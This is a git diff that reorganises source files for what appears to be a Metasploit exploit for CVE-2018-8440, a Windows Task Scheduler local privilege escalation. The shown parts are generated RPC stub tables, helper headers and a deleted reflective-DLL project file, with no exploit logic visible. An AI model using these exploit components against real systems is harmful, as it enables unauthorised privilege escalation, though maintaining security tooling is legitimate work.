base type, */ +/* 968 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 970 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 972 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 974 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 976 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 978 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 980 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 982 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 984 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 986 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 988 */ NdrFcShort( 0x104 ), /* Type Offset=260 */ + + /* Parameter arg_7 */ + +/* 990 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 992 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 994 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetLastRunInfo */ + + + /* Return value */ + +/* 996 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 998 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1002 */ NdrFcShort( 0x10 ), /* 16 */ +/* 1004 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 1006 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1008 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1010 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1012 */ NdrFcShort( 0x58 ), /* 88 */ +/* 1014 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 1016 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1018 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1020 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1022 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1024 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1026 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1028 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1030 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1032 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ +/* 1034 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1036 */ NdrFcShort( 0xf6 ), /* Type Offset=246 */ + + /* Parameter arg_2 */ + +/* 1038 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1040 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1042 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 1044 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1046 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1048 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetTaskInfo */ + + + /* Return value */ + +/* 1050 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1052 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1056 */ NdrFcShort( 0x11 ), /* 17 */ +/* 1058 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 1060 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1062 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1064 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1066 */ NdrFcShort( 0x40 ), /* 64 */ +/* 1068 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 1070 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1072 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1074 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1076 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1078 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1080 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1082 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1084 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1086 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 1088 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1090 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1092 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1094 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1096 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 1098 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1102 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 1104 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1106 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 1108 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetNumberOfMissedRuns */ + + + /* Return value */ + +/* 1110 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1112 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1116 */ NdrFcShort( 0x12 ), /* 18 */ +/* 1118 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1120 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1122 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1124 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1126 */ NdrFcShort( 0x24 ), /* 36 */ +/* 1128 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 1130 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1132 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1134 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1136 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1138 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1140 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1142 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1144 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1146 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1148 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1150 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1152 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1154 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1156 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnableTask */ + + + /* Return value */ + +/* 1158 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1160 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1164 */ NdrFcShort( 0x13 ), /* 19 */ +/* 1166 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1168 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1170 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1172 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1174 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1176 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 1178 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1180 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1182 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1184 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1186 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1188 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1190 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1192 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1194 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 1196 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1198 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1200 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1202 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1204 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + 0x0 + } + }; + +static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString = + { + 0, + { + NdrFcShort( 0x0 ), /* 0 */ +/* 2 */ + 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ +/* 4 */ 0x8, /* FC_LONG */ + 0x5c, /* FC_PAD */ +/* 6 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 8 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 10 */ + 0x11, 0x8, /* FC_RP [simple_pointer] */ +/* 12 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 14 */ + 0x12, 0x0, /* FC_UP */ +/* 16 */ NdrFcShort( 0x18 ), /* Offset= 24 (40) */ +/* 18 */ + 0x1a, /* FC_BOGUS_STRUCT */ + 0x3, /* 3 */ +/* 20 */ NdrFcShort( 0x18 ), /* 24 */ +/* 22 */ NdrFcShort( 0x0 ), /* 0 */ +/* 24 */ NdrFcShort( 0x8 ), /* Offset= 8 (32) */ +/* 26 */ 0x36, /* FC_POINTER */ + 0x36, /* FC_POINTER */ +/* 28 */ 0x8, /* FC_LONG */ + 0x40, /* FC_STRUCTPAD4 */ +/* 30 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 32 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 34 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 36 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 38 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 40 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 42 */ NdrFcShort( 0x0 ), /* 0 */ +/* 44 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x0, /* */ +/* 46 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 48 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 50 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 54 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 56 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 58 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (18) */ +/* 60 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 62 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 64 */ NdrFcShort( 0xffc6 ), /* Offset= -58 (6) */ +/* 66 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 68 */ NdrFcShort( 0x2 ), /* Offset= 2 (70) */ +/* 70 */ + 0x12, 0x0, /* FC_UP */ +/* 72 */ NdrFcShort( 0x2 ), /* Offset= 2 (74) */ +/* 74 */ + 0x1a, /* FC_BOGUS_STRUCT */ + 0x3, /* 3 */ +/* 76 */ NdrFcShort( 0x18 ), /* 24 */ +/* 78 */ NdrFcShort( 0x0 ), /* 0 */ +/* 80 */ NdrFcShort( 0x8 ), /* Offset= 8 (88) */ +/* 82 */ 0x8, /* FC_LONG */ + 0x8, /* FC_LONG */ +/* 84 */ 0x36, /* FC_POINTER */ + 0x36, /* FC_POINTER */ +/* 86 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 88 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 90 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 92 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 94 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 96 */ + 0x11, 0x8, /* FC_RP [simple_pointer] */ +/* 98 */ 0x8, /* FC_LONG */ + 0x5c, /* FC_PAD */ +/* 100 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 102 */ NdrFcShort( 0x2 ), /* Offset= 2 (104) */ +/* 104 */ + 0x12, 0x0, /* FC_UP */ +/* 106 */ NdrFcShort( 0x2 ), /* Offset= 2 (108) */ +/* 108 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 110 */ NdrFcShort( 0x0 ), /* 0 */ +/* 112 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 114 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 116 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 118 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 122 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 124 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 126 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 128 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 130 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 132 */ NdrFcShort( 0x2 ), /* Offset= 2 (134) */ +/* 134 */ + 0x12, 0x0, /* FC_UP */ +/* 136 */ NdrFcShort( 0x14 ), /* Offset= 20 (156) */ +/* 138 */ + 0x1d, /* FC_SMFARRAY */ + 0x0, /* 0 */ +/* 140 */ NdrFcShort( 0x8 ), /* 8 */ +/* 142 */ 0x1, /* FC_BYTE */ + 0x5b, /* FC_END */ +/* 144 */ + 0x15, /* FC_STRUCT */ + 0x3, /* 3 */ +/* 146 */ NdrFcShort( 0x10 ), /* 16 */ +/* 148 */ 0x8, /* FC_LONG */ + 0x6, /* FC_SHORT */ +/* 150 */ 0x6, /* FC_SHORT */ + 0x4c, /* FC_EMBEDDED_COMPLEX */ +/* 152 */ 0x0, /* 0 */ + NdrFcShort( 0xfff1 ), /* Offset= -15 (138) */ + 0x5b, /* FC_END */ +/* 156 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 158 */ NdrFcShort( 0x0 ), /* 0 */ +/* 160 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 162 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 164 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 166 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 170 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 172 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 174 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (144) */ +/* 176 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 178 */ + 0x11, 0x0, /* FC_RP */ +/* 180 */ NdrFcShort( 0xffdc ), /* Offset= -36 (144) */ +/* 182 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 184 */ NdrFcShort( 0x2 ), /* Offset= 2 (186) */ +/* 186 */ + 0x12, 0x0, /* FC_UP */ +/* 188 */ NdrFcShort( 0x2 ), /* Offset= 2 (190) */ +/* 190 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 192 */ NdrFcShort( 0x0 ), /* 0 */ +/* 194 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 196 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 198 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 200 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 204 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 206 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 208 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (144) */ +/* 210 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 212 */ + 0x12, 0x0, /* FC_UP */ +/* 214 */ NdrFcShort( 0x2 ), /* Offset= 2 (216) */ +/* 216 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 218 */ NdrFcShort( 0x0 ), /* 0 */ +/* 220 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x0, /* */ +/* 222 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 226 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 230 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 232 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 234 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 236 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 238 */ + 0x11, 0x4, /* FC_RP [alloced_on_stack] */ +/* 240 */ NdrFcShort( 0xffa0 ), /* Offset= -96 (144) */ +/* 242 */ + 0x12, 0x0, /* FC_UP */ +/* 244 */ NdrFcShort( 0x2 ), /* Offset= 2 (246) */ +/* 246 */ + 0x15, /* FC_STRUCT */ + 0x1, /* 1 */ +/* 248 */ NdrFcShort( 0x10 ), /* 16 */ +/* 250 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 252 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 254 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 256 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 258 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 260 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 262 */ NdrFcShort( 0x2 ), /* Offset= 2 (264) */ +/* 264 */ + 0x12, 0x0, /* FC_UP */ +/* 266 */ NdrFcShort( 0x2 ), /* Offset= 2 (268) */ +/* 268 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x1, /* 1 */ +/* 270 */ NdrFcShort( 0x0 ), /* 0 */ +/* 272 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 274 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 278 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 282 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 284 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 286 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (246) */ +/* 288 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 290 */ + 0x11, 0x4, /* FC_RP [alloced_on_stack] */ +/* 292 */ NdrFcShort( 0xffd2 ), /* Offset= -46 (246) */ + + 0x0 + } + }; + +static const unsigned short DefaultIfName_FormatStringOffsetTable[] = + { + 0, + 42, + 132, + 192, + 246, + 300, + 354, + 426, + 498, + 558, + 642, + 690, + 738, + 816, + 864, + 918, + 996, + 1050, + 1110, + 1158 + }; + + +static const MIDL_STUB_DESC DefaultIfName_StubDesc = + { + (void *)& DefaultIfName___RpcServerInterface, + MIDL_user_allocate, + MIDL_user_free, + 0, + 0, + 0, + 0, + 0, + rpc__MIDL_TypeFormatString.Format, + 1, /* -error bounds_check flag */ + 0x50002, /* Ndr library version */ + 0, + 0x800025b, /* MIDL Version 8.0.603 */ + 0, + 0, + 0, /* notify & notify_flag routine table */ + 0x1, /* MIDL flag */ + 0, /* cs routines */ + 0, /* proxy/server info */ + 0 + }; + +static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] = + { + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + NdrServerCall2, + 0 + }; +static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = + { + 20, + (RPC_DISPATCH_FUNCTION*)DefaultIfName_table + }; + +static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = + { + (SERVER_ROUTINE)_SchRpcHighestVersion, + (SERVER_ROUTINE)_SchRpcRegisterTask, + (SERVER_ROUTINE)SchRpcRetrieveTask, + (SERVER_ROUTINE)_SchRpcCreateFolder, + (SERVER_ROUTINE)_SchRpcSetSecurity, + (SERVER_ROUTINE)_SchRpcGetSecurity, + (SERVER_ROUTINE)_SchRpcEnumFolders, + (SERVER_ROUTINE)_SchRpcEnumTasks, + (SERVER_ROUTINE)_SchRpcEnumInstances, + (SERVER_ROUTINE)_SchRpcGetInstanceInfo, + (SERVER_ROUTINE)_SchRpcStopInstance, + (SERVER_ROUTINE)_SchRpcStop, + (SERVER_ROUTINE)_SchRpcRun, + (SERVER_ROUTINE)_SchRpcDelete, + (SERVER_ROUTINE)_SchRpcRename, + (SERVER_ROUTINE)_SchRpcScheduledRuntimes, + (SERVER_ROUTINE)_SchRpcGetLastRunInfo, + (SERVER_ROUTINE)_SchRpcGetTaskInfo, + (SERVER_ROUTINE)_SchRpcGetNumberOfMissedRuns, + (SERVER_ROUTINE)_SchRpcEnableTask + }; + +static const MIDL_SERVER_INFO DefaultIfName_ServerInfo = + { + &DefaultIfName_StubDesc, + DefaultIfName_ServerRoutineTable, + rpc__MIDL_ProcFormatString.Format, + DefaultIfName_FormatStringOffsetTable, + 0, + 0, + 0, + 0}; +#if _MSC_VER >= 1200 +#pragma warning(pop) +#endif + + +#endif /* defined(_M_AMD64)*/ + diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/stdafx.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp similarity index 97% rename from external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/stdafx.cpp rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp index bd27597c6f..c659365943 100755 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/stdafx.cpp +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp @@ -1,8 +1,8 @@ -// stdafx.cpp : source file that includes just the standard includes -// $safeprojectname$.pch will be the pre-compiled header -// stdafx.obj will contain the pre-compiled type information - -#include "stdafx.h" - -// TODO: reference any additional headers you need in STDAFX.H -// and not in this file +// stdafx.cpp : source file that includes just the standard includes +// $safeprojectname$.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/stdafx.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h similarity index 94% rename from external/source/exploits/CVE-2018-8440/dll/src/stdafx.h rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h index 354a2cc018..56b46d8844 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/stdafx.h +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h @@ -1,15 +1,15 @@ -// stdafx.h : include file for standard system include files, -// or project specific include files that are used frequently, but -// are changed infrequently -// - -#pragma once - - - -#define RPC_USE_NATIVE_WCHAR - -#include -#include -#include -#include +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + + + +#define RPC_USE_NATIVE_WCHAR + +#include +#include +#include +#include diff --git a/external/source/exploits/CVE-2018-8440/dll/src/typed_buffer.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h similarity index 94% rename from external/source/exploits/CVE-2018-8440/dll/src/typed_buffer.h rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h index f9f4640e6a..1ae447784f 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/typed_buffer.h +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h @@ -1,70 +1,70 @@ -#pragma once - -#include -#include - -template -class typed_buffer_ptr { - std::unique_ptr buffer_; - size_t size_; - -public: - typed_buffer_ptr() { - } - - explicit typed_buffer_ptr(size_t size) { - reset(size); - } - - void reset(size_t size) { - buffer_.reset(new char[size]); - memset(buffer_.get(), 0, size); - size_ = size; - } - - void resize(size_t size) { - std::unique_ptr tmp(new char[size]); - - memcpy(tmp.get(), buffer_.get(), min(size, size_)); - - buffer_ = std::move(tmp); - } - - operator T*() { - return reinterpret_cast(buffer_.get()); - } - - operator const T*() const { - return cget(); - } - - T* operator->() const { - return reinterpret_cast(buffer_.get()); - } - - const T* cget() const { - return interpret_cast(buffer_.get()); - } - - typed_buffer_ptr(const typed_buffer_ptr& other) = delete; - typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr& other) = delete; - - typed_buffer_ptr(typed_buffer_ptr&& other) { - buffer_ = std::move(other.buffer_); - size_ = other.size_; - other.size_ = 0; - } - - typed_buffer_ptr& operator=(typed_buffer_ptr&& other) { - if (this != &other) - { - buffer_ = std::move(other.buffer_); - size_ = other.size_; - other.size_ = 0; - } - } - - size_t size() const { - return size_; - } +#pragma once + +#include +#include + +template +class typed_buffer_ptr { + std::unique_ptr buffer_; + size_t size_; + +public: + typed_buffer_ptr() { + } + + explicit typed_buffer_ptr(size_t size) { + reset(size); + } + + void reset(size_t size) { + buffer_.reset(new char[size]); + memset(buffer_.get(), 0, size); + size_ = size; + } + + void resize(size_t size) { + std::unique_ptr tmp(new char[size]); + + memcpy(tmp.get(), buffer_.get(), min(size, size_)); + + buffer_ = std::move(tmp); + } + + operator T*() { + return reinterpret_cast(buffer_.get()); + } + + operator const T*() const { + return cget(); + } + + T* operator->() const { + return reinterpret_cast(buffer_.get()); + } + + const T* cget() const { + return interpret_cast(buffer_.get()); + } + + typed_buffer_ptr(const typed_buffer_ptr& other) = delete; + typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr& other) = delete; + + typed_buffer_ptr(typed_buffer_ptr&& other) { + buffer_ = std::move(other.buffer_); + size_ = other.size_; + other.size_ = 0; + } + + typed_buffer_ptr& operator=(typed_buffer_ptr&& other) { + if (this != &other) + { + buffer_ = std::move(other.buffer_); + size_ = other.size_; + other.size_ = 0; + } + } + + size_t size() const { + return size_; + } }; \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj b/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj deleted file mode 100755 index ad2014556d..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj +++ /dev/null @@ -1,269 +0,0 @@ - - - - - Debug - ARM - - - Debug - Win32 - - - Debug - x64 - - - Release - ARM - - - Release - Win32 - - - Release - x64 - - - - - - - - - - - - - - - - - - - - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} - reflective_dll - Win32Proj - - - - DynamicLibrary - v120 - MultiByte - true - - - DynamicLibrary - v120 - MultiByte - true - - - DynamicLibrary - v120 - Unicode - - - DynamicLibrary - v120 - Unicode - - - DynamicLibrary - v120 - MultiByte - false - - - DynamicLibrary - v120 - Unicode - - - - - - - - - - - - - - - - - - - - - - - - - <_ProjectFileVersion>11.0.50727.1 - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - true - - - true - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - true - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - false - - - false - - - ..\..\..\..\..\data\exploits\CVE-2018-8440 - $(Platform)\$(Configuration)\ - false - ALPC_TaskSched - - - - Disabled - 